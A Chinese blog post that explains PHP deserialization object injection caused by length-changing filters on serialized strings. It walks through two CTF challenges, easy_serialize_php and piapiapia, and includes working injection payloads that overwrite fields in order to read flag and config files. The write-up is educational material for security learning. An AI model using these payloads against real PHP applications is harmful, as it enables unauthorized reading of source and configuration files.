浅析PHP反序列化中过滤函数使用不当导致的对象注入问题


Posted in PHP onFebruary 15, 2020

1.漏洞产生的原因

#### 正常的反序列化语句是这样的

$a='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"password";s:6:"abcdef";}';

但是如果写成这样

$b='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"password";s:6:"123456";}s:8:"password";s:6:"abcde";}';

也可以正常的编译, 而且下面一条语句的结果是 password=“123456” 而不是abcde

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

结果

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

这就说明一个问题,在反序列化的时候,只要求第一个序列化字符串合法就行,换我个理解,就是反序列话时,他会从前往后读取,当读取第一个合法的序列化的字符串时,就会反序列化。

### 当过滤用户输入参数的时候,如果先序列化再对序列化过后的字符串进行过滤,而且在过滤的过程中会导致原本的长度改变,就可能造成序列化对象注入漏洞。

此处参考别人的代码:

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

可以看到,这里过滤函数将原来的x换成了zz,但是长度却超过了原来的长度 ,但是原来长度的数字时没变的,这就导致报错。但是试想一下,如果这里的密码是可控的,然后我们输入字符

的时候带入双引号和} 会怎么样呢? 看如下代码

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

结果

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

第一排是我们构造的东西序列化过后的值,

第二排是序列化过后的值进行过滤过后的值,可以看到,此时由于x换成了z,而前面读40的时候正好会读到最后一个x,从而使我们输入的新对象得以注入,而且得到正常的反序列化。

第三排是反序列化过后的到的值,此时原本的aaaaaa的值已经被我们覆盖。

二:实例分析

根据上面的原因可知,产生漏洞最直接的原因是因为序列化过后的字符串被过滤的时长度发生变化, 根据这个这个原因,我们就可以把漏洞分为 长度变长,和长度变短两种情况,注意! 如果长度不变的话,不会引起漏洞产生。

(1) 长度变短。

题目: 安洵杯2019 easy_serialize_php // 在https://buuoj.cn/这个靶场里又复现

源码:

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

根据提示在phpinfo拿到

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

很显然答案在 d0g3_f1ag.php里面,关键是我们怎么去读取他的源码 ,可以看到最后一排的会获取 ['img'] 中的 的源码,我们仅需要覆盖img的值将他变成d0g3_f1ag.php就行。

在看这个过滤函数

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

他会使得输入的相应字符变为空,也就是让序列化后的字符串变短,我们就可以利用此来吞掉原本的变量名,而注入我们想注入的代码。

第一种解法:值逃逸

d0g3_f1ag.php的base64 编码 ZDBnM19mMWFnLnBocA== 长度20

在本地测试的时候得到正常的 序列化字符是这样的

a:3:{s:4:"user";s:5:"guest";s:8:"function";s:3:"123";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

前者user,和function 的值都是我们可控的

我们想要构造的是 s:3:"img";s:20:"ZDBnM19mMWFnLnBocA=="; 设想一下 ,如果我们把它设置function的值,并且在前面user的值利用过滤函数将后面的 "s:8:"function";s:xx:" 吞掉,那么function的值,也就是我们想要注入的对象,不就正好上位了吗? 但是注意闭合前面的由于吞掉而缺少的分号和双引号,而且,这里两个双引号紧挨着会报错,所以我们加一个字符,再把这个字符一起吞掉就行,还有 这里前面是 a:3: 所以我在最后还要添加一个属性。

payload

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

读到源码

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

再去修改payload的文件中的值,然后再去访问,发现什么也没有返回,然后尝试 /../d0g3_fllllllag 然后base64编码 去访问就会返回flag

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

(2)长度变长

题目 [0CTF] piapiapia // 同样在buu里又复现

wp参考这里 -> https://3water.com/article/180496.htm

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";s:8:"sea_sand";s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

红色部分是我们想要注入的,这道题的过滤函数有三个 ,但是导致长度变化的过滤是这个

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

where->hacker 多出了一个字符

但是另一个过滤使 nickname 有长度限制

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

这里strlen我们可以用数组绕过,但是如果使用数组就会引起序列化字符串产生变化

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";a:1:{i:0;s:3:"xxx"};s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

注意数组在序列化中的表示 是 先; 再 }

这里我进行了本地测试

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

结果:

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

红色部分为我们想注入的,蓝色的是我们提交payload的地方,后面实际上根本不用管

现在我们想的是通过where ->hacker 多了一个字符,这样使我们输入的nickname的值逃逸出去变成对象,

加上闭合前面的单引号和反括号 就是这样 ";}s:5:"photo";s:10:"config.php";}

一共就是34个字符, 一个where 逃逸出一个字符,这里就需要34个where

payload:wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}    

三.总结

武汉加油!中国加油!我加油!

以上所述是小编给大家介绍的PHP反序列化中过滤函数使用不当导致的对象注入问题,希望对大家有所帮助!

PHP 相关文章推荐
php缓存技术介绍
Nov 25 PHP
java EJB 加密与解密原理的一个例子
Jan 11 PHP
PHP 替换模板变量实现步骤
Aug 24 PHP
PHP开发中常用的三个表单验证函数使用小结
Mar 03 PHP
rephactor 优秀的PHP的重构工具
Jun 09 PHP
PHP函数篇之掌握ord()与chr()函数应用
Dec 05 PHP
Zend Studio去除编辑器的语法警告设置方法
Oct 24 PHP
php获取远程文件的内容和大小
Nov 03 PHP
Zend Framework动作助手(Zend_Controller_Action_Helper)用法详解
Mar 05 PHP
Thinkphp框架中D方法与M方法的区别
Dec 23 PHP
laravel中命名路由的使用方法
Feb 24 PHP
ThinkPHP 模板引擎使用详解
May 07 PHP
laravel框架使用极光推送消息操作示例
Feb 15 #PHP
laravel框架使用阿里云短信发送消息操作示例
Feb 15 #PHP
laravel框架实现敏感词汇过滤功能示例
Feb 15 #PHP
PHP 枚举类型的管理与设计知识点总结
Feb 13 #PHP
PHP+ajax实现上传、删除、修改单张图片及后台处理逻辑操作详解
Feb 12 #PHP
分享8个Laravel模型时间戳使用技巧小结
Feb 12 #PHP
tp5.0框架隐藏index.php入口文件及模块和控制器的方法分析
Feb 11 #PHP
You might like
PHP定时执行任务实现方法详解(Timer)
2015/07/30 PHP
php使用fullcalendar日历插件详解
2019/03/06 PHP
jquery.cookie.js 操作cookie实现记住密码功能的实现代码
2011/04/27 Javascript
使用jquery.validate自定义方法实现"手机号码或者固话至少填写一个"的逻辑验证
2014/09/01 Javascript
推荐8款jQuery轻量级树形Tree插件
2014/11/12 Javascript
简介AngularJS的HTML DOM支持情况
2015/06/17 Javascript
解决AngualrJS页面刷新导致异常显示问题
2017/04/20 Javascript
Web制作验证码功能实例代码
2017/06/19 Javascript
通过fastclick源码分析彻底解决tap“点透”
2017/12/24 Javascript
vue框架搭建之axios使用教程
2018/07/11 Javascript
Vue面试题及Vue知识点整理
2018/10/07 Javascript
Vue Components 数字键盘的实现
2019/09/18 Javascript
JS防抖和节流实例解析
2019/09/24 Javascript
Vue结合路由配置递归实现菜单栏功能
2020/06/16 Javascript
python socket网络编程步骤详解(socket套接字使用)
2013/12/06 Python
python编写的最短路径算法
2015/03/25 Python
详细解读Python的web.py框架下的application.py模块
2015/05/02 Python
python清除指定目录内所有文件中script的方法
2015/06/30 Python
Python 正则表达式的高级用法
2016/12/04 Python
python版本的仿windows计划任务工具
2018/04/30 Python
python装饰器简介---这一篇也许就够了(推荐)
2019/04/01 Python
pygame实现俄罗斯方块游戏(基础篇2)
2019/10/29 Python
基于python实现把json数据转换成Excel表格
2020/05/07 Python
Python celery原理及运行流程解析
2020/06/13 Python
Python3基于plotly模块保存图片表格
2020/08/03 Python
详解HTML5 LocalStorage 本地存储
2016/12/23 HTML / CSS
Android本地应用打开方法——通过html5写连接
2016/03/11 HTML / CSS
Linux文件系统类型
2012/02/15 面试题
如何写你的创业计划书
2014/01/07 职场文书
初中化学教学反思
2014/01/23 职场文书
《难忘的泼水节》教学反思
2014/02/27 职场文书
文明礼仪标语
2014/06/13 职场文书
护理学专业求职信
2014/06/29 职场文书
中学政教处工作总结
2015/08/13 职场文书
在CSS中映射鼠标位置并实现通过鼠标移动控制页面元素效果(实例代码)
2021/04/22 HTML / CSS
React配置子路由的实现
2021/06/03 Javascript